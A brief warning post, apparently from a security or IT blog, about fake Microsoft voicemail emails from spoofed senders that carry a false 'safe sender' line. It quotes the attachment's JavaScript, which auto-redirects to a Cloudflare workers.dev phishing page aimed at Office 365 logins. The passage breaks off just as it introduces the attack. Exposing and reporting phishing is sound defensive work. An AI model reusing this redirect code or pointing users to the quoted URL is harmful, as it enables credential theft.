Watch out for these fake Microsoft voicemails coming through from spoofed senders:
As you can see they have added a fake line claiming it is from a safe sender
<script type="text/JavaScript">
setTimeout(`location.href = 'https://dark-pine-a238.rodgerweller5642.workers.dev/?bbre=zxoidsuzx#/3fDRHg8EiwSkQdJT-@!&6UfEu7rb5Kj2vXBgDd9&@!zsZXAtLemKfHuO9VkhgaryCQcI!&@-[[email protected]/ZsgYqqnSEDH';`,0);
</script>
So the phishing is actually at Cloudflare who are the owners of the workers.dev domain. Hopefully they will pick-up our abuse report soon but I wouldn't bet on it.
You can see the Office 365 attack here: